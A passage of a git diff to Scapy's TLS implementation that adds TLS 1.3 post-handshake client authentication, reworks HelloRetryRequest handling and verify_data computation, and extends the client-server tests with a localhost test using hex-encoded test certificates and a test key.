-1077,17 +1142,12 @@ def tls13_should_add_ClientHello(self): ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], binders=[psk_binder_entry]) else: - ext += TLS_Ext_SupportedGroups(groups=supported_groups) + ext += TLS_Ext_SupportedGroups(groups=self.supported_groups) ext += TLS_Ext_KeyShare_CH( client_shares=[KeyShareEntry(group=self.curve)] ) ext += TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss", "sha256+rsa"]) - # Add TLS_Ext_ServerName - if self.server_name: - ext += TLS_Ext_ServerName( - servernames=[ServerName(servername=self.server_name)] - ) p.ext = ext self.add_msg(p) raise self.TLS13_ADDED_CLIENTHELLO() @@ -1141,6 +1201,13 @@ def tls13_should_handle_AlertMessage_(self): self.raise_on_packet(TLSAlert, self.TLS13_HANDLED_ALERT_FROM_SERVERFLIGHT1) + @ATMT.condition(TLS13_RECEIVED_SERVERFLIGHT1, prio=4) + def tls13_should_handle_ChangeCipherSpec_after_tls13_retry(self): + # Middlebox compatibility mode after a HelloRetryRequest. + if self.cur_session.tls13_retry: + self.raise_on_packet(TLSChangeCipherSpec, + self.TLS13_RECEIVED_SERVERFLIGHT1) + @ATMT.state() def TLS13_HANDLED_ALERT_FROM_SERVERFLIGHT1(self): self.vprint("Received Alert message !") @@ -1159,77 +1226,28 @@ def TLS13_HELLO_RETRY_REQUESTED(self): def tls13_should_add_ClientHello_Retry(self): s = self.cur_session s.tls13_retry = True - # we have to use the legacy, plaintext TLS record here - self.add_record(is_tls13=False) # We retrieve the group to be used and the selected version from the # previous message - hrr = s.handshake_messages_parsed[-1] - if isinstance(hrr, TLS13HelloRetryRequest): - pass - ciphersuite = hrr.cipher + hrr = self.cur_pkt + self.ciphersuite = hrr.cipher + # "The server's extensions MUST contain supported_versions." + self.advertised_tls_version = None if hrr.ext: for e in hrr.ext: if isinstance(e, TLS_Ext_KeyShare_HRR): - selected_group = e.selected_group + self.curve = e.selected_group if isinstance(e, TLS_Ext_SupportedVersion_SH): - selected_version = e.version - if not selected_group or not selected_version: - raise self.CLOSE_NOTIFY() - - ext = [] - ext += TLS_Ext_SupportedVersion_CH(versions=[_tls_version[selected_version]]) # noqa: E501 - - if s.tls13_psk_secret: - if self.tls13_psk_mode == "psk_dhe_ke": - ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_dhe_ke"), - ext += TLS_Ext_SupportedGroups(groups=[_tls_named_groups[selected_group]]) # noqa: E501 - ext += TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group=selected_group)]) # noqa: E501 - else: - ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_ke") - - if s.client_session_ticket: - - # XXX Retrieve parameters from first ClientHello... - cs_cls = _tls_cipher_suites_cls[s.tls13_ticket_ciphersuite] - hkdf = TLS13_HKDF(cs_cls.hash_alg.name.lower()) - hash_len = hkdf.hash.digest_size - - # We compute the client's view of the age of the ticket (ie - # the time since the receipt of the ticket) in ms - agems = int((time.time() - s.client_ticket_age) * 1000) - - # Then we compute the obfuscated version of the ticket age by - # adding the "ticket_age_add" value included in the ticket - # (modulo 2^32) - obfuscated_age = ((agems + s.client_session_ticket_age_add) & - 0xffffffff) - - psk_id = PSKIdentity(identity=s.client_session_ticket, - obfuscated_ticket_age=obfuscated_age) - - psk_binder_entry = PSKBinderEntry(binder_len=hash_len, - binder=b"\x00" * hash_len) + self.advertised_tls_version = e.version - ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], - binders=[psk_binder_entry]) - else: - hkdf = TLS13_HKDF("sha256") - hash_len = hkdf.hash.digest_size - psk_id = PSKIdentity(identity='Client_identity') - psk_binder_entry = PSKBinderEntry(binder_len=hash_len, - binder=b"\x00" * hash_len) - - ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], - binders=[psk_binder_entry]) + if _tls_named_groups[self.curve] not in self.supported_groups: + self.vprint("No common groups found in TLS 1.3 Hello Retry Request!") + raise self.CLOSE_NOTIFY() - else: - ext += TLS_Ext_SupportedGroups(groups=[_tls_named_groups[selected_group]]) # noqa: E501 - ext += TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group=selected_group)]) # noqa: E501 - ext += TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss"]) + if not self.advertised_tls_version: + self.vprint("No supported_versions found in TLS 1.3 Hello Retry Request!") + raise self.CLOSE_NOTIFY() - p = TLS13ClientHello(ciphers=ciphersuite, ext=ext) - self.add_msg(p) - raise self.TLS13_ADDED_CLIENTHELLO() + self.tls13_should_add_ClientHello() @ATMT.state() def TLS13_HANDLED_SERVERHELLO(self): @@ -1334,21 +1352,31 @@ def tls13_should_add_ClientCertificate(self): XXX We may want to add a complete chain. """ - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if TLS13CertificateRequest not in hs_msg: - raise self.TLS13_ADDED_CLIENTCERTIFICATE() - # return + if not (isinstance(self.cur_pkt, TLS13CertificateRequest) or + self.in_handshake(TLS13CertificateRequest)): + return + certs = [] if self.mycert: certs += _ASN1CertAndExt(cert=self.mycert) - self.add_msg(TLS13Certificate(certs=certs)) + self.add_msg( + TLS13Certificate( + certs=certs, + cert_req_ctxt=self.cur_session.tls13_cert_req_ctxt, + ) + ) raise self.TLS13_ADDED_CLIENTCERTIFICATE() @ATMT.state() def TLS13_ADDED_CLIENTCERTIFICATE(self): pass + @ATMT.condition(TLS13_ADDED_CLIENTCERTIFICATE, prio=0) + def tls13_should_skip_ClientCertificateVerify(self): + if not self.mycert: + return self.tls13_should_add_ClientFinished() + @ATMT.condition(TLS13_ADDED_CLIENTCERTIFICATE, prio=1) def tls13_should_add_ClientCertificateVerify(self): """ @@ -1358,11 +1386,6 @@ def tls13_should_add_ClientCertificateVerify(self): We should verify that before adding the message. We should also handle the case when the Certificate message was empty. """ - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if (TLS13CertificateRequest not in hs_msg or - self.mycert is None or - self.mykey is None): - return self.tls13_should_add_ClientFinished() self.add_msg(TLSCertificateVerify()) raise self.TLS13_ADDED_CERTIFICATEVERIFY() @@ -1386,6 +1409,10 @@ def tls13_should_send_ClientFlight2(self): @ATMT.state() def TLS13_SENT_CLIENTFLIGHT2(self): + if self.tls13_doing_client_postauth: + self.tls13_doing_client_postauth = False + self.vprint("TLS 1.3 post-handshake authentication sent!") + raise self.WAIT_CLIENTDATA() self.vprint("TLS 1.3 handshake completed!") self.vprint_sessioninfo() self.vprint("You may send data or use 'quit'.") diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 63f42384008..946c93f4776 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -11,10 +11,11 @@ We support versions SSLv2 to TLS 1.3, along with many features. -In order to run a server listening on tcp/4433: -> from scapy.all import * -> t = TLSServerAutomaton(mycert='', mykey='') -> t.run() +In order to run a server listening on tcp/4433:: + + from scapy.layers.tls import * + t = TLSServerAutomaton(mycert='', mykey='') + t.run() """ import socket @@ -263,6 +264,9 @@ def RECEIVED_CLIENTFLIGHT1(self): def tls13_should_handle_ClientHello(self): self.raise_on_packet(TLS13ClientHello, self.tls13_HANDLED_CLIENTHELLO) + if self.cur_session.advertised_tls_version == 0x0304: + self.raise_on_packet(TLSClientHello, + self.tls13_HANDLED_CLIENTHELLO) @ATMT.condition(RECEIVED_CLIENTFLIGHT1, prio=2) def should_handle_ClientHello(self): @@ -1170,8 +1174,7 @@ def SSLv2_HANDLED_CLIENTFINISHED(self): @ATMT.condition(SSLv2_HANDLED_CLIENTFINISHED, prio=1) def sslv2_should_add_ServerVerify_from_ClientFinished(self): - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if SSLv2ServerVerify in hs_msg: + if self.in_handshake(SSLv2ServerVerify): return self.add_record(is_sslv2=True) p = SSLv2ServerVerify(challenge=self.cur_session.sslv2_challenge) @@ -1180,8 +1183,7 @@ def sslv2_should_add_ServerVerify_from_ClientFinished(self): @ATMT.condition(SSLv2_RECEIVED_CLIENTFINISHED, prio=2) def sslv2_should_add_ServerVerify_from_NoClientFinished(self): - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if SSLv2ServerVerify in hs_msg: + if self.in_handshake(SSLv2ServerVerify): return self.add_record(is_sslv2=True) p = SSLv2ServerVerify(challenge=self.cur_session.sslv2_challenge) @@ -1208,8 +1210,7 @@ def sslv2_should_send_ServerVerify(self): @ATMT.state() def SSLv2_SENT_SERVERVERIFY(self): - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if SSLv2ClientFinished in hs_msg: + if self.in_handshake(SSLv2ClientFinished): raise self.SSLv2_HANDLED_CLIENTFINISHED() else: raise self.SSLv2_RECEIVED_CLIENTFINISHED() @@ -1218,8 +1219,7 @@ def SSLv2_SENT_SERVERVERIFY(self): @ATMT.condition(SSLv2_HANDLED_CLIENTFINISHED, prio=2) def sslv2_should_add_RequestCertificate(self): - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if not self.client_auth or SSLv2RequestCertificate in hs_msg: + if not self.client_auth or self.in_handshake(SSLv2RequestCertificate): return self.add_record(is_sslv2=True) self.add_msg(SSLv2RequestCertificate(challenge=randstring(16))) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 9d283e3ea75..f767c15d449 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -44,6 +44,7 @@ _TLSClientVersionField) from scapy.layers.tls.extensions import (_ExtensionsLenField, _ExtensionsField, _cert_status_type, + TLS_Ext_PostHandshakeAuth, TLS_Ext_SupportedVersion_CH, TLS_Ext_SignatureAlgorithms, TLS_Ext_SupportedVersion_SH, @@ -113,9 +114,15 @@ def tls_session_update(self, msg_str): """ Covers both post_build- and post_dissection- context updates. """ - - self.tls_session.handshake_messages.append(msg_str) - self.tls_session.handshake_messages_parsed.append(self) + # RFC8446 sect 4.4.1 + # "Note, however, that subsequent post-handshake authentications do not + # include each other, just the messages through the end of the main + # handshake." + if self.tls_session.post_handshake: + self.tls_session.post_handshake_messages.append(msg_str) + else: + self.tls_session.handshake_messages.append(msg_str) + self.tls_session.handshake_messages_parsed.append(self) ############################################################################### @@ -336,9 +343,10 @@ def tls_session_update(self, msg_str): break if s.sid: s.middlebox_compatibility = True - if isinstance(e, TLS_Ext_SignatureAlgorithms): s.advertised_sig_algs = e.sig_algs + if isinstance(e, TLS_Ext_PostHandshakeAuth): + s.post_handshake_auth = True class TLS13ClientHello(_TLSHandshake): @@ -467,6 +475,8 @@ def tls_session_update(self, msg_str): break if isinstance(e, TLS_Ext_SignatureAlgorithms): s.advertised_sig_algs = e.sig_algs + if isinstance(e, TLS_Ext_PostHandshakeAuth): + s.post_handshake_auth = True ############################################################################### @@ -665,7 +675,6 @@ def tls_session_update(self, msg_str): if not s.middlebox_compatibility: s.triggered_pwcs_commit = True elif connection_end == "client": - s.prcs = readConnState(ciphersuite=cs_cls, connection_end=connection_end, tls_version=s.tls_version) @@ -704,6 +713,7 @@ def tls_session_update(self, msg_str): s = self.tls_session s.tls13_retry = True s.tls13_client_pubshares = {} + # RFC8446 sect 4.4.1 # If the server responds to a ClientHello with a HelloRetryRequest # The value of the first ClientHello is replaced by a message_hash if s.client_session_ticket: @@ -800,7 +810,8 @@ def post_dissection_tls_session_update(self, msg_str): s.wcs = self.tls_session.pwcs s.triggered_pwcs_commit = False else: - s.triggered_prcs_commit = True + s.triggered_pwcs_commit = True + ############################################################################### # Certificate # ############################################################################### @@ -1179,6 +1190,11 @@ class TLS13CertificateRequest(_TLSHandshake): length_from=lambda pkt: pkt.msglen - pkt.cert_req_ctxt_len - 3)] + def tls_session_update(self, msg_str): + super(TLS13CertificateRequest, self).tls_session_update(msg_str) + self.tls_session.tls13_cert_req_ctxt = self.cert_req_ctxt + + ############################################################################### # ServerHelloDone # ############################################################################### @@ -1201,11 +1217,16 @@ class TLSCertificateVerify(_TLSHandshake): _TLSSignatureField("sig", None, length_from=lambda pkt: pkt.msglen)] + # See https://datatracker.ietf.org/doc/html/rfc8446#section-4.4 for how to compute + # the signature. + def build(self, *args, **kargs): sig = self.getfieldval("sig") if sig is None: s = self.tls_session m = b"".join(s.handshake_messages) + if s.post_handshake: + m += b"".join(s.post_handshake_messages) tls_version = s.tls_version if tls_version is None: tls_version = s.advertised_tls_version @@ -1226,6 +1247,8 @@ def build(self, *args, **kargs): def post_dissection(self, pkt): s = self.tls_session m = b"".join(s.handshake_messages) + if s.post_handshake: + m += b"".join(s.post_handshake_messages) tls_version = s.tls_version if tls_version is None: tls_version = s.advertised_tls_version @@ -1365,6 +1388,8 @@ def build(self, *args, **kargs): if fval is None: s = self.tls_session handshake_msg = b"".join(s.handshake_messages) + if s.post_handshake: + handshake_msg += b"".join(s.post_handshake_messages) con_end = s.connection_end tls_version = s.tls_version if tls_version is None: @@ -1374,13 +1399,16 @@ def build(self, *args, **kargs): self.vdata = s.wcs.prf.compute_verify_data(con_end, "write", handshake_msg, ms) else: - self.vdata = s.compute_tls13_verify_data(con_end, "write") + self.vdata = s.compute_tls13_verify_data(con_end, "write", + handshake_msg) return _TLSHandshake.build(self, *args, **kargs) def post_dissection(self, pkt): s = self.tls_session if not s.frozen: handshake_msg = b"".join(s.handshake_messages) + if s.post_handshake: + handshake_msg += b"".join(s.post_handshake_messages) tls_version = s.tls_version if tls_version is None: tls_version = s.advertised_tls_version @@ -1394,7 +1422,8 @@ def post_dissection(self, pkt): log_runtime.info("TLS: invalid Finished received [%s]", pkt_info) # noqa: E501 elif tls_version >= 0x0304: con_end = s.connection_end - verify_data = s.compute_tls13_verify_data(con_end, "read") + verify_data = s.compute_tls13_verify_data(con_end, "read", + handshake_msg) if self.vdata != verify_data: pkt_info = pkt.firstlayer().summary() log_runtime.info("TLS: invalid Finished received [%s]", pkt_info) # noqa: E501 @@ -1405,7 +1434,7 @@ def post_build_tls_session_update(self, msg_str): tls_version = s.tls_version if tls_version is None: tls_version = s.advertised_tls_version - if tls_version >= 0x0304: + if tls_version >= 0x0304 and not s.post_handshake: s.pwcs = writeConnState(ciphersuite=type(s.wcs.ciphersuite), connection_end=s.connection_end, tls_version=s.tls_version) @@ -1415,6 +1444,9 @@ def post_build_tls_session_update(self, msg_str): elif s.connection_end == "client": s.compute_tls13_traffic_secrets_end() s.compute_tls13_resumption_secret() + if s.connection_end == "client": + s.post_handshake = True + s.post_handshake_messages = [] def post_dissection_tls_session_update(self, msg_str): self.tls_session_update(msg_str) @@ -1422,7 +1454,7 @@ def post_dissection_tls_session_update(self, msg_str): tls_version = s.tls_version if tls_version is None: tls_version = s.advertised_tls_version - if tls_version >= 0x0304: + if tls_version >= 0x0304 and not s.post_handshake: s.prcs = readConnState(ciphersuite=type(s.rcs.ciphersuite), connection_end=s.connection_end, tls_version=s.tls_version) @@ -1432,6 +1464,9 @@ def post_dissection_tls_session_update(self, msg_str): elif s.connection_end == "server": s.compute_tls13_traffic_secrets_end() s.compute_tls13_resumption_secret() + if s.connection_end == "server": + s.post_handshake = True + s.post_handshake_messages = [] # Additional handshake messages @@ -1659,7 +1694,6 @@ def build(self): return _TLSHandshake.build(self) def post_dissection_tls_session_update(self, msg_str): - self.tls_session_update(msg_str) if self.tls_session.connection_end == "client": self.tls_session.client_session_ticket = self.ticket diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 4b2a54a74b7..d8dd7f81220 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -504,7 +504,9 @@ def __init__(self, self.tls13_handshake_secret = None self.tls13_master_secret = None self.tls13_derived_secrets = {} - self.post_handshake_auth = False + self.tls13_cert_req_ctxt = False + self.post_handshake = False # whether handshake is done + self.post_handshake_auth = False # whether "Post-Handshake Auth" is used self.tls13_ticket_ciphersuite = None self.tls13_retry = False self.middlebox_compatibility = False @@ -514,6 +516,9 @@ def __init__(self, self.handshake_messages = [] self.handshake_messages_parsed = [] + # Post-handshake, handshake messages for post-handshake client authentication + self.post_handshake_messages = [] + # Flag, whether we derive the secret as Extended MS or not self.extms = False self.session_hash = None @@ -804,27 +809,50 @@ def compute_tls13_traffic_secrets_end(self): elif self.connection_end == "client": self.pwcs.tls13_derive_keys(cts0) - def compute_tls13_verify_data(self, connection_end, read_or_write): - shts = "server_handshake_traffic_secret" - chts = "client_handshake_traffic_secret" + def compute_tls13_verify_data(self, connection_end, read_or_write, + handshake_context): + # RFC8446 - 4.4 + # +-----------+-------------------------+-----------------------------+ + # | Mode | Handshake Context | Base Key | + # +-----------+-------------------------+-----------------------------+ + # | Server | ClientHello ... later | server_handshake_traffic_ | + # | | of EncryptedExtensions/ | secret | + # | | CertificateRequest | | + # | | | | + # | Client | ClientHello ... later | client_handshake_traffic_ | + # | | of server | secret | + # | | Finished/EndOfEarlyData | | + # | | | | + # | Post- | ClientHello ... client | client_application_traffic_ | + # | Handshake | Finished + | secret_N | + # | | CertificateRequest | | + # +-----------+-------------------------+-----------------------------+ + if self.post_handshake: + # RFC8446 - 4.6 + # TLS also allows other messages to be sent after the main handshake. + # These messages use a handshake content type and are encrypted under + # the appropriate application traffic key. + shts = self.tls13_derived_secrets["server_traffic_secrets"][-1] + chts = self.tls13_derived_secrets["client_traffic_secrets"][-1] + else: + shts = self.tls13_derived_secrets["server_handshake_traffic_secret"] + chts = self.tls13_derived_secrets["client_handshake_traffic_secret"] if read_or_write == "read": hkdf = self.rcs.hkdf if connection_end == "client": - basekey = self.tls13_derived_secrets[shts] + basekey = shts elif connection_end == "server": - basekey = self.tls13_derived_secrets[chts] + basekey = chts elif read_or_write == "write": hkdf = self.wcs.hkdf if connection_end == "client": - basekey = self.tls13_derived_secrets[chts] + basekey = chts elif connection_end == "server": - basekey = self.tls13_derived_secrets[shts] + basekey = shts if not hkdf or not basekey: warning("Missing arguments for verify_data computation!") return None - # XXX this join() works in standard cases, but does it in all of them? - handshake_context = b"".join(self.handshake_messages) return hkdf.compute_verify_data(basekey, handshake_context) def compute_tls13_resumption_secret(self): diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index ded10a510d6..ad84b88b6e0 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -81,7 +81,7 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= cookie=cookie, client_auth=client_auth, handle_session_ticket=handle_session_ticket, - debug=5, + debug=4, **kwargs) # Sync threads q.put(t) @@ -248,17 +248,17 @@ def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None, commands.append(b"wait") commands.append(b"quit") if version == "0002": - t = TLSClientAutomaton(data=commands, version="sslv2", debug=5, mycert=mycert, mykey=mykey, + t = TLSClientAutomaton(data=commands, version="sslv2", debug=4, mycert=mycert, mykey=mykey, session_ticket_file_in=session_ticket_file_in, session_ticket_file_out=session_ticket_file_out) elif version == "0304": ch = TLS13ClientHello(ciphers=int(cipher_suite_code, 16)) - t = TLSClientAutomaton(client_hello=ch, data=commands, version="tls13", debug=5, mycert=mycert, mykey=mykey, + t = TLSClientAutomaton(client_hello=ch, data=commands, version="tls13", debug=4, mycert=mycert, mykey=mykey, session_ticket_file_in=session_ticket_file_in, session_ticket_file_out=session_ticket_file_out) else: ch = TLSClientHello(version=int(version, 16), ciphers=int(cipher_suite_code, 16)) - t = TLSClientAutomaton(client_hello=ch, data=commands, debug=5, mycert=mycert, mykey=mykey, + t = TLSClientAutomaton(client_hello=ch, data=commands, debug=4, mycert=mycert, mykey=mykey, session_ticket_file_in=session_ticket_file_in, session_ticket_file_out=session_ticket_file_out) print("Running client...") @@ -379,6 +379,137 @@ try: except: pass +############ +############ ++ TLS client automaton tests against builtin ssl using Post Handshake Authentication +~ client post_handshake_auth + += Load native server util functions + +# Imports + +import ssl +import contextlib +import threading + +load_layer("tls") +load_layer("http") + +# Define PKI + +root_ca_cert = hex_bytes("0a2d2d2d2d2d424547494e2043455254494649434154452d2d2d2d2d0a4d4949446c7a4343416e2b6741774942416749555664642b794d436278356772635441773335717939337552517841774451594a4b6f5a496876634e4151454c0a42514177577a454c4d416b474131554542684d4351554578436a414942674e564241674d41574578436a414942674e564241634d41574578436a414942674e560a42416f4d41574578436a414942674e564241734d41574578436a414942674e5642414d4d415745784544414f42676b71686b69473977304243514557415745770a4868634e4d6a4d774e5445344d444d7a4d4455305768634e4d7a67774e5445354d444d7a4d445530576a42624d517377435159445651514745774a425154454b0a4d41674741315545434177425954454b4d41674741315545427777425954454b4d41674741315545436777425954454b4d41674741315545437777425954454b0a4d4167474131554541777742595445514d41344743537147534962334451454a4152594259544343415349774451594a4b6f5a496876634e41514542425141440a676745504144434341516f4367674542414a37775a326b6457577a6b6277725838565176743565747a55587737577967664970475038786543483632446979690a354a48546b3352716a6531444362476369566b4b386956746439507852475478764a6a476a49694b686a3545306e304c336542513771466c6567374a6d3147750a507a4154455779456f6a773975513343794c4f76395742374574434e626647476334544f564649635742684e5a5777324e306e37533834546f435a4942366c4e0a4c4c583639646f65684a33372b55457455553159775a4a474d72586a435653502b6f3136436568306c4d466e6553594d6a376c434b49426666525278725765720a354763733577423548574d636d6630626e774471534d78374d566a746f663678506b7570495039526f497977306b324f71516c4543612b4855556451306346590a564a53506d63424b554e6336787254756c346e447136442b6563594f7461754854726c36326e55434177454141614e544d464577485159445652304f424259450a4650786e62526467356a436549742b65556d314342695245583536334d42384741315564497751594d4261414650786e62526467356a436549742b65556d31430a42695245583536334d41384741315564457745422f7751464d414d42416638774451594a4b6f5a496876634e4151454c4251414467674542414876625a7a572b0a767553313239393268774442424a67586938386f426955787459383931556839364e77315876586841685873745338775551643749497a62795251626b6866530a424e6d626f59656e6b6b4272462b37474e696e394630564c516f7a344c67414c566e376c763635414f51554d7357503859694238563841516c6c447a305a2f770a69335a78423631436c50694f4d347a6e4a6a33324263794f50594267456b4a6c695143503854514c68555067504f742f7a4130453873584e56757354563976690a3168356d6e77332f4248572f52524e79496642365938336c5939345a577933754a72514d674352633957344a5076644e564a61494b38694241743258533276740a5665634a4b6942785347474a4564486561774b6a542f5674736b64432b3357696f756430527652716c7745622f4a50686b686553576d4a6b70436545773253720a6e6f64314c4c346b6a574159344c633d0a2d2d2d2d2d454e442043455254494649434154452d2d2d2d2d0a") +rsa_cert = hex_bytes("0a2d2d2d2d2d424547494e2043455254494649434154452d2d2d2d2d0a4d494944666a4343416d616741774942416749424154414e42676b71686b69473977304241517346414442624d517377435159445651514745774a425154454b0a4d41674741315545434177425954454b4d41674741315545427777425954454b4d41674741315545436777425954454b4d41674741315545437777425954454b0a4d4167474131554541777742595445514d41344743537147534962334451454a4152594259544165467730794d7a41314d5467774d7a51354d445261467730790a4f4441314d5463774d7a51354d4452614d467378437a414a42674e5642415954416b4a434d516f774341594456515149444146694d516f7743415944565151480a444146694d516f77434159445651514b444146694d516f77434159445651514c444146694d516f774341594456515144444146694d5241774467594a4b6f5a490a6876634e41516b42466746694d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b43415145413647667370784a570a655a366231313741312f6f637668303368706e6e366e6b5064487a5a33387956784b4f586a38505a4f4659794d79676a6546742f625a644a6a4b4179716432520a6c4374397a76716b3067306346336552373756457a626b724b6f7a384e73506757566577496e5933436c5633313367666b4e755955652f73666259303448376f0a5455694a73392f524c383975746a444e742b6d7259544f62426e4c7036734546774a646574426f694e6a623767693631363641763471576c50556d5a5331796b0a69386e385867554e5131535a5a4d4776497a4138556148433034684a556c342f4a5944622f51665551715034316464426d3877677252726b553176384136346b0a6a543344334954766f7234516e4b6b61436a32675853486658306e42636e4a644759572f484a38642f426e2b47714f6b324d5a515636656649722b4f6b5948330a7448575753543271676f6c6930514944415141426f303077537a414a42674e5648524d45416a41414d4230474131556444675157424254754631747a507a557a0a6b726471483838483850443354485269637a416642674e5648534d4547444157674254385a323058594f59776e694c666e6c4a745167596b52462b65747a414e0a42676b71686b6947397730424151734641414f4341514541484278614d6d68744a5035524d306b48595932486952755862635677455a2b6a46745968636252460a53484d32562f59526d55576f324f78666236574c727679482f65703552792f525a4c737261426a4e53495749394774462b3457794c305949482b52436e3235550a35316a34724e587269484d5a6c2f796375686d7456496c754a4f4d6a67572b44684b6b4568726e307a674653537654636c797a6843726653556f52595a7a362b0a474e305a705476486f35512f746d72752f6f6c47695a4271464d30554d4e4f4577444251586c68645964365134313479793574616c2f524f4c424b64595949420a534744696b552b356a75764e613761686e6f726365314c5a6d6d6e332b576530673052792f73362f39555135577339336f39635136335458654775773078674b0a7a496744627a38534948634c2b747559784b68364357636b4f436b67366e564e63616b45554c2f3243674b687a413d3d0a2d2d2d2d2d454e442043455254494649434154452d2d2d2d2d0a") +rsa_key = hex_bytes("0a2d2d2d2d2d424547494e2050524956415445204b45592d2d2d2d2d0a4d494945766749424144414e42676b71686b6947397730424151454641415343424b67776767536b41674541416f49424151446f5a2b796e456c5a356e7076580a587344582b68792b485465476d65667165513930664e6e667a4a58456f35655077396b34566a497a4b434e34573339746c306d4d6f444b70335a47554b33334f0a2b71545344527758643548767455544e755373716a507732772b425a56374169646a634b5658665865422b5132356852372b7839746a54676675684e53496d7a0a333945767a3236324d4d3233366174684d35734763756e71775158416c313630476949324e7675434c7258726f432f6970615539535a6c4c584b534c796678650a42513144564a6c6b7761386a4d4478526f634c5469456c53586a386c674e7639423952436f2f6a56313047627a43437447755254572f77447269534e506350630a684f2b697668436371526f4b506142644964396653634679636c305a686238636e783338476634616f365459786c4258703538697634365267666530645a5a4a0a5061714369574c5241674d42414145436767454142756750447342516768446f317475357744617555394774394b6e4f5958665973667444685553726c4754370a3173373436465646624d3259704f73576763543778507054627877477832713179644e77676b364237637045383770464563454669364241795962614a7241320a414e777355726f4c55356a2b425363617a63714e765162365a336141727656457a774532665539394d7a47786c31776e612b6a5152716d4a456f764c466a66310a68584841786e4d6765514f73556c6f506e6833682f4159774b3934385444732b634a4b4a33776a376a6335794a66456e70352f73784268433165356738594f450a563671426c682f702f3462615074757a49726a324d384f44566772304661624945362b537530577a4c6366597a50432b35536930543345673735672f736e666b0a724473703743517a55644973696d3443485432627a44483656775749774271386d4f645961766e592f514b426751442b764d626b414d54714c2f4d482f70614c0a46672f505272322f502b384c745a555247593477414138566c4b4334664342473250544a474837475231546559386e5a466d584878526561534a4667365855690a6153534f484b39586d2f43715962477664624a7553426f42492f6562566264706c504454376143374a52697766704176504d7a516b6552326d36556775516e720a6b49474376584f2f673874525357494e6d68354e5a46364533514b42675144706a732f78783531423753544c386d5946544e7147506a52316669697635684b2b0a492b6255643975585a33527445503078666e682f344f6c682b7a6c664d596b7a49356c376a68384c74326a6b31364978426a38376e774366566c636b5044464d0a516c4f624a676376383632364a5843377745666c3837594e77524d426b5238776964685a774b5052464a79395072315270782b715176507054483633704368770a704f435a7273514d68514b4267472b73334e6936435a6e4e575a4d6f706d446c5642722f6e56484a756f64386e4a5135697438364e324b7a6e4e346a394a5a360a714a3238636c2b4569413153322f7569325134434e7232356b4a7057337259754f41746851664637654c2b4a517264304e72776f4f645a454b566e6338794b440a58437a636f546c4b49772f452f487270416256794d434662544d4953764f6d626d567479714e724e38595636555655374f6f75644d393631416f4742414a4d630a6f5635706e5751704f3051374b6f657349506a74745a314d4764537831707874674c6654787a3157724c38474e48553464433459504f69366c536967797771720a49634878677879654b6a50366e753743514a494e56526349433175486a6f573651573834524d3676626e34526c7a4372724a33724a49454658444e67645954640a54716b3537665745526a58746a74496673704a4d4764615a6d446554377555453958505834535542416f4742414e4466535966544239774330334859415846550a78553554682f763075387a7a2b7235477a586863342b33513446746769336b51743164682f702b47384c764257744b65354d622f6651424c77514154613143330a735837786863612b66553467642f536638526a6a54783634696b413545585147306c6443696a6c4463554c4f5868386d4557574d636b2b333932416648584a740a4a687951526b427a453941664339526f642b61365455686f0a2d2d2d2d2d454e442050524956415445204b45592d2d2d2d2d0a") + +cafile = get_temp_file() +certfile = get_temp_file() +keyfile = get_temp_file() + +with open(cafile, "wb") as fd: + fd.write(root_ca_cert) + +with open(certfile, "wb") as fd: + fd.write(rsa_cert) + +with open(keyfile, "wb") as fd: + fd.write(rsa_key) + +# Define server + +REQS = [ + HTTP() / HTTPRequest(Path="/a.txt", Host="127.0.0.1:59000") / b"hey1", + HTTP() / HTTPRequest(Path="/b.txt", Host="127.0.0.1:59000") / b"hey2", +] + +RESPS = [ + HTTP() / HTTPResponse(Status_Code="401", Reason_Phrase="Unauthorized") / "Please login", + HTTP() / HTTPResponse(Status_Code="200", Reason_Phrase="OK") / "Welcome", +] + +def run_tls_native_test_server(post_handshake_auth=False, + with_hello_retry=False): + # Create + context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) + context.load_verify_locations(cafile=cafile) + if post_handshake_auth: + context.post_handshake_auth = True + if with_hello_retry: + context.set_ecdh_curve("prime256v1") + context.verify_mode = ssl.CERT_REQUIRED + context.load_cert_chain(certfile=certfile, keyfile=keyfile) + + lock = threading.Lock() + lock.acquire() + + def ssl_server(): + server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server.settimeout(10) + server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + server.bind(("0.0.0.0", 59000)) + server.listen(5) + # Sync + lock.release() + # Accept socket + client_socket, addr = server.accept() + ssl_client_socket = context.wrap_socket(client_socket, server_side=True) + # Receive / send data + resp = ssl_client_socket.read(len(REQS[0])) + assert resp == bytes(REQS[0]) + ssl_client_socket.send(bytes(RESPS[0])) + if post_handshake_auth: + # Post-handshake + t = ssl_client_socket.verify_client_post_handshake() + # Receive / send data + resp = ssl_client_socket.read(len(REQS[1])) + assert resp == bytes(REQS[1]) + 